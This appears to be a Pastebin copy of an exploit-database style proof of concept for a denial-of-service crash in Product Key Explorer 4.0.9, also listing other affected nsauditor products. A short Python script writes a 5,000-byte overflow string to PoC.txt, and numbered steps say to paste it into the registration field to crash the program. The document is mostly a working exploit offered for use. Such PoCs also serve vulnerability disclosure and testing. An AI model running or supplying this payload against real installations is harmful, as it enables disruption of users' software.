Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Exploit Title: Product Key Explorer 4.0.9 - Denial of Service (PoC)
- # Date: 2018-12-25
- # Exploit Author: T3jv1l
- # Vendor Homepage: :http://www.nsauditor.com
- # Software: http://www.nsauditor.com/downloads/productkeyexplorer_setup.exe
- # Contact: https://twitter.com/T3jv1l
- # Version: Product Key Explorer 4.0.9
- # Tested on: Windows 7 SP1 x86
- # Other affected software from the vendor
- # Software: http://www.nsauditor.com/downloads/backeyrecovery_setup.exe
- # Software: http://www.nsauditor.com/downloads/apkf_setup.exe
- # Software: http://www.nsauditor.com/downloads/officeproductkeyfinder_setup.exe
- # Software: http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe
- # Software: http://www.nsauditor.com/downloads/spotmsn_setup.exe
- # Software: http://www.nsauditor.com/downloads/spotie_setup.exe
- # Software: http://www.nsauditor.com/downloads/spotftp_setup.exe
- # Software: http://www.network-inventory-software.com/downloads/nhsi_setup.exe
- # Software: http://www.nsauditor.com/downloads/nsi_setup.exe
- # Software: http://www.nsauditor.com/downloads/blueauditor_setup.exe
- # Software: http://www.nsauditor.com/downloads/networksleuth_setup.exe
- # Software: http://www.nsauditor.com/downloads/remshutdown_setup.exe
- # Software: http://www.nsauditor.com/downloads/dnss_setup.exe
- # PoC:
- # 1. Download and install the setup file
- # 2. A file "PoC.txt" will be created
- # 3. Click Help > Register... in tool bar
- # 4. Copy the contents of the file (PoC.txt) and paste in the Registration Key/Name field
- # 5. Click OK and BOOMMMM !!!!
- #!/usr/bin/python
- buffer = "\x41" * 2000
- buffer += "\x42" * 2000
- buffer += "\x43" * 1000
- payload = buffer
- try:
- f=open("PoC.txt","w")
- print "[+] Creating %s bytes payload..." %len(payload)
- f.write(payload)
- f.close()
- print "[+] File created!"
- except:
- print "File cannot be created"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement